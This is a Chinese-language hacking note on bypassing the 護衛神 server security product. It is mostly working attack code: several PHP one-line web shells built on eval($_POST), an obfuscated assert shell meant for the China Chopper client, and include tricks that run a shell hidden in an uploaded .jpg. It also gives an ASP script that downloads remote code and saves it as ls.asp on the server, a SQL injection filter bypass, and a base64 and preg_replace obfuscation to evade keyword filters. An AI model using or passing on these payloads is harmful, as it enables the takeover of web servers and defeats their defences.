過護衛神的一些方法

1、馬兒篇，都是之前能夠過護衛神的馬
2、注入篇，能夠繞過注入的方法
3、規則篇，根據護衛神的過濾規則你們能夠本身設計馬兒

 

 

1、馬兒篇
----------------1號--------------------------
<?php   
@eval
($_POST['1']);?>

----------------2號--------------------------
<title>login</title>nono<?php

eval
($_POST
[1])

?>

--------------------3號---------------------------------------------
<?php $a = str_replace(x,"","axsxxsxexrxxt");
$a($_POST["c"]); ?>
菜刀直接連，不須要構造鏈接字符串，密碼 c

--------------------相似於過安全狗的包含方法-------------------------------------------
A.asp版本：
將一句話保存爲  XX.jpg  上傳後 地址爲  .../xxxxxx.jpg         

在上傳一個 x.asp 內容爲 <!–#include  file="../xxxxxx.jpg"-->  

B.php版本
若是是php的話：
<?php
include "1.htm";
?>

------------------實在不行，還能夠下載---------------------------------------------
遠程下載馬
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.xxx.com/123/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("ls.asp"),2
set sGet = nothing
set sPOST = nothing
%>
---------------------------------------------------------------
---------------------------------------------------------------

2、注入篇

/*%00*/截斷符
select/*%00*/* from admin;

---------------------------------------------------------------
---------------------------------------------------------------

3、規則篇
能夠利用相似：
<?php
$code='一串base64'; //base64編碼
$x=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef"); //字符串替換
$a = '/a/';//正則規則
preg_replace($a,'e'.'v'.'a'.'l'.'('.$x.'('.$code.'))','a'); //正則替換
?>

方法繞過關鍵詞過濾